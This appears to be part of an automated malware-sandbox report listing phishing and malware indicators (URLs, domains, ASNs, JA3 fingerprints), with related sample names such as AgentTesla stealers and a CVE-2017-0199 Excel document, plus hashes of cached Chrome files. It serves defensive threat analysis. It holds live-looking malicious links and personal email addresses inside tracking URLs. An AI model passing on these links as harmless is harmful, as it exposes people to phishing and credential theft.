	https://mcas-proxyweb.mcas.ms/certificate-checker?login=false&originalUrl=https%3A%2F%2Fapc01.safelinks.protection.outlook.com.mcas.ms%2F%3Furl%3Dhttps%253A%252F%252Fwittywebevents.wipro.com%252Femail-analytics%252Fapi%252Ft%252Fl%253FobjId%253D637c92a3e4b00b92caee94cc%26data%3D05%257C02%257Cgary.fabrizio1%2540wipro.com%257Cb8fe953db5914d2bac8108dc65645f6b%257C258ac4e4146a411e9dc879a9e12fd6da%257C0%257C0%257C638496729264132835%257CUnknown%257CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%253D%257C0%257C%257C%257C%26sdata%3DX8fjcrb6FJIv3A6MeNVFttkEvMY37x2gBwDUYM2DULg%253D%26reserved%3D0%26McasTsid%3D20893&McasCSRF=a0328b22f805eebb5f9c68ee3df482ea7a84065b3bbced70493927bf9ce1f085	Get hash	malicious	Unknown	Browse
	https://mcas-proxyweb.mcas.ms/certificate-checker?login=false&originalUrl=https%3A%2F%2Fapc01.safelinks.protection.outlook.com.mcas.ms%2F%3Furl%3Dhttps%253A%252F%252Fwittywebevents.wipro.com%252Femail-analytics%252Fapi%252Ft%252Fl%253FobjId%253D637c92a3e4b00b92caee94cc%26data%3D05%257C02%257Cgary.fabrizio1%2540wipro.com%257Cb8fe953db5914d2bac8108dc65645f6b%257C258ac4e4146a411e9dc879a9e12fd6da%257C0%257C0%257C638496729264132835%257CUnknown%257CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%253D%257C0%257C%257C%257C%26sdata%3DX8fjcrb6FJIv3A6MeNVFttkEvMY37x2gBwDUYM2DULg%253D%26reserved%3D0%26McasTsid%3D20893&McasCSRF=a0328b22f805eebb5f9c68ee3df482ea7a84065b3bbced70493927bf9ce1f085	Get hash	malicious	Unknown	Browse
	https://newtipsguide.com	Get hash	malicious	Unknown	Browse
	https://cdp1.tracking.e360.salesforce.com/click?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiJhMzYwL3Byb2QvNTBhMGYyODg2ZTg4NDA3Y2I1ODUwYmRjOWQwZGIxZTUiLCJjcmVhdGlvbl90aW1lIjoxNzE0MDg4MzE4LCJtZXNzYWdlX2lkIjoiMGd4dnAwdGZzeWpiNm4yamRiMDRuYWd5IzcyNWE1YTc5LTgxYzQtNGM0Yy1iNmI1LTdmMTY0MTM2ZTE2NCIsImNoYW5uZWxfdHlwZSI6ImVtYWlsIiwiZXhwIjoxNzQ1NjI0MzE4LCJyZWRpcmVjdF91cmwiOiJodHRwczovL3ZtLmJyYWRlbnRvbmNjLmluZm8vP2VvdmlldWJyJnFyYz1yZW5lZS5zY2h3YXJ0ekBxci5jb20uYXUiLCJpbmRpdmlkdWFsX2lkIjoiODdiZTY3MTdlZjJmMThjYzI3YmMyMWQ4OTJhY2Q2NzAifQ.iusDS7mld4iiq9DDY82R1MJ9ToHxmMDW3SMbDENZOZQ	Get hash	malicious	HTMLPhisher	Browse
	https://marinatitle.com	Get hash	malicious	Unknown	Browse
	https://site-stlp3.powerappsportals.com/	Get hash	malicious	Unknown	Browse
	https://ndw5xvotehflt.pages.dev/smart89/	Get hash	malicious	Unknown	Browse
13.107.213.41	Quotation.xls	Get hash	malicious	Unknown	Browse	2s.gg/3zM
13.107.213.41	http://www.serviceadg.com	Get hash	malicious	Unknown	Browse	fr.linkedin.com/company/service-adg

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
part-0013.t-0009.t-msedge.net	https://shorturl.at/lMOT7	Get hash	malicious	Unknown	Browse	13.107.213.41
	https://mcas-proxyweb.mcas.ms/certificate-checker?login=false&originalUrl=https%3A%2F%2Fapc01.safelinks.protection.outlook.com.mcas.ms%2F%3Furl%3Dhttps%253A%252F%252Fmyapps.microsoft.com%252Fsignin%252F08558f59-9161-41fc-88b3-f0434087a79c%253FtenantId%253D258ac4e4-146a-411e-9dc8-79a9e12fd6da%26data%3D05%257C01%257Cgary.fabrizio1%2540Service.wipro.com%257C8a0e1c61209e469846ba08dbe05e2370%257C258ac4e4146a411e9dc879a9e12fd6da%257C0%257C0%257C638350467206547446%257CUnknown%257CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%253D%257C3000%257C%257C%257C%26sdata%3Dp0jrjFUb%252Fusi2RID%252FGIlCE82AM9dEDuVAB4PHdDC1%252F4%253D%26reserved%3D0%26McasTsid%3D20893&McasCSRF=a0328b22f805eebb5f9c68ee3df482ea7a84065b3bbced70493927bf9ce1f085	Get hash	malicious	Unknown	Browse	13.107.246.41
	https://mcas-proxyweb.mcas.ms/certificate-checker?login=false&originalUrl=https%3A%2F%2Fapc01.safelinks.protection.outlook.com.mcas.ms%2F%3Furl%3Dhttps%253A%252F%252Fwittywebevents.wipro.com%252Femail-analytics%252Fapi%252Ft%252Fl%253FobjId%253D637c92a3e4b00b92caee94cc%26data%3D05%257C02%257Cgary.fabrizio1%2540wipro.com%257Cb8fe953db5914d2bac8108dc65645f6b%257C258ac4e4146a411e9dc879a9e12fd6da%257C0%257C0%257C638496729264132835%257CUnknown%257CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%253D%257C0%257C%257C%257C%26sdata%3DX8fjcrb6FJIv3A6MeNVFttkEvMY37x2gBwDUYM2DULg%253D%26reserved%3D0%26McasTsid%3D20893&McasCSRF=a0328b22f805eebb5f9c68ee3df482ea7a84065b3bbced70493927bf9ce1f085	Get hash	malicious	Unknown	Browse	13.107.246.41
	https://mcas-proxyweb.mcas.ms/certificate-checker?login=false&originalUrl=https%3A%2F%2Fapc01.safelinks.protection.outlook.com.mcas.ms%2F%3Furl%3Dhttps%253A%252F%252Fwittywebevents.wipro.com%252Femail-analytics%252Fapi%252Ft%252Fl%253FobjId%253D637c92a3e4b00b92caee94cc%26data%3D05%257C02%257Cgary.fabrizio1%2540wipro.com%257Cb8fe953db5914d2bac8108dc65645f6b%257C258ac4e4146a411e9dc879a9e12fd6da%257C0%257C0%257C638496729264132835%257CUnknown%257CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%253D%257C0%257C%257C%257C%26sdata%3DX8fjcrb6FJIv3A6MeNVFttkEvMY37x2gBwDUYM2DULg%253D%26reserved%3D0%26McasTsid%3D20893&McasCSRF=a0328b22f805eebb5f9c68ee3df482ea7a84065b3bbced70493927bf9ce1f085	Get hash	malicious	Unknown	Browse	13.107.246.41
	https://cdp1.tracking.e360.salesforce.com/click?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiJhMzYwL3Byb2QvNTBhMGYyODg2ZTg4NDA3Y2I1ODUwYmRjOWQwZGIxZTUiLCJjcmVhdGlvbl90aW1lIjoxNzE0MDg4MzE4LCJtZXNzYWdlX2lkIjoiMGd4dnAwdGZzeWpiNm4yamRiMDRuYWd5IzcyNWE1YTc5LTgxYzQtNGM0Yy1iNmI1LTdmMTY0MTM2ZTE2NCIsImNoYW5uZWxfdHlwZSI6ImVtYWlsIiwiZXhwIjoxNzQ1NjI0MzE4LCJyZWRpcmVjdF91cmwiOiJodHRwczovL3ZtLmJyYWRlbnRvbmNjLmluZm8vP2VvdmlldWJyJnFyYz1yZW5lZS5zY2h3YXJ0ekBxci5jb20uYXUiLCJpbmRpdmlkdWFsX2lkIjoiODdiZTY3MTdlZjJmMThjYzI3YmMyMWQ4OTJhY2Q2NzAifQ.iusDS7mld4iiq9DDY82R1MJ9ToHxmMDW3SMbDENZOZQ	Get hash	malicious	HTMLPhisher	Browse	13.107.213.41
	https://marinatitle.com	Get hash	malicious	Unknown	Browse	13.107.246.41
	https://site-stlp3.powerappsportals.com/	Get hash	malicious	Unknown	Browse	13.107.213.41
	https://aulixalrrydrea.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.41
	SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.32374.20351.xlsx	Get hash	malicious	Unknown	Browse	13.107.213.41
	https://j4tpu.bpmsafelink.com/c/0aR4TTLkLUqplUI-2TrhdA	Get hash	malicious	HTMLPhisher	Browse	13.107.246.41

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UNIFIEDLAYER-AS-1US	https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1	Get hash	malicious	Unknown	Browse	192.185.214.24
	https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==	Get hash	malicious	HTMLPhisher	Browse	162.241.120.242
	https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==	Get hash	malicious	HTMLPhisher	Browse	162.241.120.242
	https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/o76fri/enpmZG9tbF9zdXBlcnZpc29yMXN0X2Fzc2lzdGFudEBmZC5vcmc=	Get hash	malicious	HTMLPhisher	Browse	162.241.120.242
	https://pub-02d879d6055b4f31b3db7cbbb1499011.r2.dev/%60%60~~~%5D%5D%5D%5D%5D.html#theunis@khk.co.za	Get hash	malicious	HTMLPhisher	Browse	162.241.27.10
	https://content.amanet.org/?m=CiGW.81UwlU3LD6ZH5M4ZoUXv03dAeWfC&r=https://control.mailblaze.com/index.php/survey/ps97367sjy584	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	162.241.114.35
	http://jtmidgett.law/CaptRedr.html	Get hash	malicious	HTMLPhisher	Browse	162.241.120.242
	https://itniy4gbb.cc.rs6.net/tn.jsp?f=001DpCT81a7BIE926OduG6KmKkwKebSAbUZq28C52DoY-FfQJyM_2Gq3l18V1j7KWwJQTfGlQ_HSq0vC8xqJqFST9z0CwmpWgUieBjKckdJcSODJ_3vu5MzvaSoOGbGY9SjpWQtg9-aAXm1e6VV91z84Q2_wlyDMR98&c=i37ZFF5Dy2QSFqOfb2TVpr5vkMFqaR6DdoQbIhzcRV7G2oFwX8NEvA==&ch=2ErEiCYnoykaXa1uoD0AgTD1vOpSqc6zh3ef32Gb4XR_ut8_qvmzHA==&c=&ch=&__=/mrlZp0zmTKgGvsPpx0JUyCMjGZr4J6/Z2dvbnphbGV6c2FsYXNAc2FuaXRhcy5lcw==	Get hash	malicious	HTMLPhisher	Browse	162.241.120.242
	SecuriteInfo.com.Win32.PWSX-gen.18376.4403.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.218.140
	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	192.185.35.67
MICROSOFT-CORP-MSN-AS-BLOCKUS	https://shorturl.at/lMOT7	Get hash	malicious	Unknown	Browse	13.107.213.41
	https://mcas-proxyweb.mcas.ms/certificate-checker?login=false&originalUrl=https%3A%2F%2Fapc01.safelinks.protection.outlook.com.mcas.ms%2F%3Furl%3Dhttps%253A%252F%252Fmyapps.microsoft.com%252Fsignin%252F08558f59-9161-41fc-88b3-f0434087a79c%253FtenantId%253D258ac4e4-146a-411e-9dc8-79a9e12fd6da%26data%3D05%257C01%257Cgary.fabrizio1%2540Service.wipro.com%257C8a0e1c61209e469846ba08dbe05e2370%257C258ac4e4146a411e9dc879a9e12fd6da%257C0%257C0%257C638350467206547446%257CUnknown%257CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%253D%257C3000%257C%257C%257C%26sdata%3Dp0jrjFUb%252Fusi2RID%252FGIlCE82AM9dEDuVAB4PHdDC1%252F4%253D%26reserved%3D0%26McasTsid%3D20893&McasCSRF=a0328b22f805eebb5f9c68ee3df482ea7a84065b3bbced70493927bf9ce1f085	Get hash	malicious	Unknown	Browse	13.107.213.41
	https://mcas-proxyweb.mcas.ms/certificate-checker?login=false&originalUrl=https%3A%2F%2Fapc01.safelinks.protection.outlook.com.mcas.ms%2F%3Furl%3Dhttps%253A%252F%252Fwittywebevents.wipro.com%252Femail-analytics%252Fapi%252Ft%252Fl%253FobjId%253D637c92a3e4b00b92caee94cc%26data%3D05%257C02%257Cgary.fabrizio1%2540wipro.com%257Cb8fe953db5914d2bac8108dc65645f6b%257C258ac4e4146a411e9dc879a9e12fd6da%257C0%257C0%257C638496729264132835%257CUnknown%257CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%253D%257C0%257C%257C%257C%26sdata%3DX8fjcrb6FJIv3A6MeNVFttkEvMY37x2gBwDUYM2DULg%253D%26reserved%3D0%26McasTsid%3D20893&McasCSRF=a0328b22f805eebb5f9c68ee3df482ea7a84065b3bbced70493927bf9ce1f085	Get hash	malicious	Unknown	Browse	52.230.18.38
	https://mcas-proxyweb.mcas.ms/certificate-checker?login=false&originalUrl=https%3A%2F%2Fapc01.safelinks.protection.outlook.com.mcas.ms%2F%3Furl%3Dhttps%253A%252F%252Fwittywebevents.wipro.com%252Femail-analytics%252Fapi%252Ft%252Fl%253FobjId%253D637c92a3e4b00b92caee94cc%26data%3D05%257C02%257Cgary.fabrizio1%2540wipro.com%257Cb8fe953db5914d2bac8108dc65645f6b%257C258ac4e4146a411e9dc879a9e12fd6da%257C0%257C0%257C638496729264132835%257CUnknown%257CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%253D%257C0%257C%257C%257C%26sdata%3DX8fjcrb6FJIv3A6MeNVFttkEvMY37x2gBwDUYM2DULg%253D%26reserved%3D0%26McasTsid%3D20893&McasCSRF=a0328b22f805eebb5f9c68ee3df482ea7a84065b3bbced70493927bf9ce1f085	Get hash	malicious	Unknown	Browse	52.230.18.38
	https://cdp1.tracking.e360.salesforce.com/click?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiJhMzYwL3Byb2QvNTBhMGYyODg2ZTg4NDA3Y2I1ODUwYmRjOWQwZGIxZTUiLCJjcmVhdGlvbl90aW1lIjoxNzE0MDg4MzE4LCJtZXNzYWdlX2lkIjoiMGd4dnAwdGZzeWpiNm4yamRiMDRuYWd5IzcyNWE1YTc5LTgxYzQtNGM0Yy1iNmI1LTdmMTY0MTM2ZTE2NCIsImNoYW5uZWxfdHlwZSI6ImVtYWlsIiwiZXhwIjoxNzQ1NjI0MzE4LCJyZWRpcmVjdF91cmwiOiJodHRwczovL3ZtLmJyYWRlbnRvbmNjLmluZm8vP2VvdmlldWJyJnFyYz1yZW5lZS5zY2h3YXJ0ekBxci5jb20uYXUiLCJpbmRpdmlkdWFsX2lkIjoiODdiZTY3MTdlZjJmMThjYzI3YmMyMWQ4OTJhY2Q2NzAifQ.iusDS7mld4iiq9DDY82R1MJ9ToHxmMDW3SMbDENZOZQ	Get hash	malicious	HTMLPhisher	Browse	40.126.7.35
	https://marinatitle.com	Get hash	malicious	Unknown	Browse	13.107.213.41
	https://site-stlp3.powerappsportals.com/	Get hash	malicious	Unknown	Browse	13.107.213.41
	https://m7qfa5ng4lp7.blob.core.windows.net/m7qfa5ng4lp7/1.html?4rKpnF7821CfLO43wsacrvmomp962ETPJQJTKIDNZNNV65316UFUY14332V14#14/43-7821/962-65316-14332	Get hash	malicious	Phisher	Browse	20.38.102.196
	https://aulixalrrydrea.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.41
	https://u18727881.ct.sendgrid.net/ls/click?upn=u001.C98xKppRPMcm9u3MCGfzKZoMS1OpBvTt67698T0dL36uvjeaIcwJCGWCF40JX0jTgfIq_7OnzmxzMpUZLpDhO-2FIQbFKADvzXAOcu2Z6qDokXjolLBB1Q9VRzsF9K8mIjVEFl-2BHay6WBbN5WlzpyVSr4HVkHTzvzCtmwku69-2FJZyLx3-2B4ShTXTnPqinKBtOGbSRbSYGRG3Lt22AUmt-2BZ99sH-2B6Jqf0nt-2BFsnaCp0VSm16eoPdzoH74Sn7jINM2DWCxglARpPWuPOE3iiXY03LGL6ko4g-3D-3D	Get hash	malicious	Unknown	Browse	20.64.88.2

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://shorturl.at/lMOT7	Get hash	malicious	Unknown	Browse	23.34.16.106 40.127.169.103
	https://mcas-proxyweb.mcas.ms/certificate-checker?login=false&originalUrl=https%3A%2F%2Fapc01.safelinks.protection.outlook.com.mcas.ms%2F%3Furl%3Dhttps%253A%252F%252Fmyapps.microsoft.com%252Fsignin%252F08558f59-9161-41fc-88b3-f0434087a79c%253FtenantId%253D258ac4e4-146a-411e-9dc8-79a9e12fd6da%26data%3D05%257C01%257Cgary.fabrizio1%2540Service.wipro.com%257C8a0e1c61209e469846ba08dbe05e2370%257C258ac4e4146a411e9dc879a9e12fd6da%257C0%257C0%257C638350467206547446%257CUnknown%257CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%253D%257C3000%257C%257C%257C%26sdata%3Dp0jrjFUb%252Fusi2RID%252FGIlCE82AM9dEDuVAB4PHdDC1%252F4%253D%26reserved%3D0%26McasTsid%3D20893&McasCSRF=a0328b22f805eebb5f9c68ee3df482ea7a84065b3bbced70493927bf9ce1f085	Get hash	malicious	Unknown	Browse	23.34.16.106 40.127.169.103
	https://mcas-proxyweb.mcas.ms/certificate-checker?login=false&originalUrl=https%3A%2F%2Fapc01.safelinks.protection.outlook.com.mcas.ms%2F%3Furl%3Dhttps%253A%252F%252Fwittywebevents.wipro.com%252Femail-analytics%252Fapi%252Ft%252Fl%253FobjId%253D637c92a3e4b00b92caee94cc%26data%3D05%257C02%257Cgary.fabrizio1%2540wipro.com%257Cb8fe953db5914d2bac8108dc65645f6b%257C258ac4e4146a411e9dc879a9e12fd6da%257C0%257C0%257C638496729264132835%257CUnknown%257CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%253D%257C0%257C%257C%257C%26sdata%3DX8fjcrb6FJIv3A6MeNVFttkEvMY37x2gBwDUYM2DULg%253D%26reserved%3D0%26McasTsid%3D20893&McasCSRF=a0328b22f805eebb5f9c68ee3df482ea7a84065b3bbced70493927bf9ce1f085	Get hash	malicious	Unknown	Browse	23.34.16.106 40.127.169.103
	https://mcas-proxyweb.mcas.ms/certificate-checker?login=false&originalUrl=https%3A%2F%2Fapc01.safelinks.protection.outlook.com.mcas.ms%2F%3Furl%3Dhttps%253A%252F%252Fwittywebevents.wipro.com%252Femail-analytics%252Fapi%252Ft%252Fl%253FobjId%253D637c92a3e4b00b92caee94cc%26data%3D05%257C02%257Cgary.fabrizio1%2540wipro.com%257Cb8fe953db5914d2bac8108dc65645f6b%257C258ac4e4146a411e9dc879a9e12fd6da%257C0%257C0%257C638496729264132835%257CUnknown%257CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%253D%257C0%257C%257C%257C%26sdata%3DX8fjcrb6FJIv3A6MeNVFttkEvMY37x2gBwDUYM2DULg%253D%26reserved%3D0%26McasTsid%3D20893&McasCSRF=a0328b22f805eebb5f9c68ee3df482ea7a84065b3bbced70493927bf9ce1f085	Get hash	malicious	Unknown	Browse	23.34.16.106 40.127.169.103
	https://site-stlp3.powerappsportals.com/	Get hash	malicious	Unknown	Browse	23.34.16.106 40.127.169.103
	https://ndw5xvotehflt.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	23.34.16.106 40.127.169.103
	https://cnmxukx5efilc7lvlel.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	23.34.16.106 40.127.169.103
	https://bocmyw606y.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	23.34.16.106 40.127.169.103
	https://sabbynarula-73p7yyw32q-ue.a.run.app/Win0belzer0sys07/index.html	Get hash	malicious	Unknown	Browse	23.34.16.106 40.127.169.103
	https://uporniacomnuvidx.z13.web.core.windows.net/index.html	Get hash	malicious	TechSupportScam	Browse	23.34.16.106 40.127.169.103

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32058)
Category:	downloaded
Size (bytes):	86659
Entropy (8bit):	5.36781915816204
Encrypted:	false
SSDEEP:	1536:YNhEyjjTikEJO4edXXe9J578go6MWX2xkj8e4c4j2ll2AckaXEP6n15HZ+FhFcQ7:uxc2yjx4j2uX/kcQDU8Cu9
MD5:	C9F5AEECA3AD37BF2AA006139B935F0A
SHA1:	1055018C28AB41087EF9CCEFE411606893DABEA2
SHA-256:	87083882CC6015984EB0411A99D3981817F5DC5C90BA24F0940420C5548D82DE
SHA-512:	DCFF2B5C2B8625D3593A7531FF4DDCD633939CC9F7ACFEB79C18A9E6038FDAA99487960075502F159D44F902D965B0B5AED32B41BFA66A1DC07D85B5D5152B58
Malicious:	false
Reputation:	moderate, very likely benign file
URL:	https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js
Preview:	/! jQuery v3.2.1 \| (c) JS Foundation and other contributors \| jquery.org/license /.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var

Chrome Cache Entry: 71

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
Category:	dropped
Size (bytes):	1435
Entropy (8bit):	7.8613342322590265
Encrypted:	false
SSDEEP:	24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
MD5:	9F368BC4580FED907775F31C6B26D6CF
SHA1:	E393A40B3E337F43057EEE3DE189F197AB056451
SHA-256:	7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
SHA-512:	0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
Malicious:	false
Reputation:	high, very likely benign file
Preview:	...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.\|..~.\|{~...b{8...zv.....8\|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.\|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dgN.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f;.....Zhrr.,.U....6.Y....+Zd.R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

Chrome Cache Entry: 72

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
Category:	downloaded
Size (bytes):	673
Entropy (8bit):	7.6596900876595075
Encrypted:	false
SSDEEP:	12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
MD5:	0E176276362B94279A4492511BFCBD98
SHA1:	389FE6B51F62254BB98939896B8C89EBEFFE2A02
SHA-256:	9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
SHA-512:	8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
Malicious:	false
Reputation:	high, very likely benign file
URL:	https://logincdn.msauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
Preview:	...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q.....~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1......#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...

Chrome Cache Entry: 73

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	high, very likely benign file
URL:	https://logincdn.msauth.net/16.000.28595.2/images/favicon.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 74

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65451)
Category:	downloaded
Size (bytes):	86927
Entropy (8bit):	5.289226719276158
Encrypted:	false
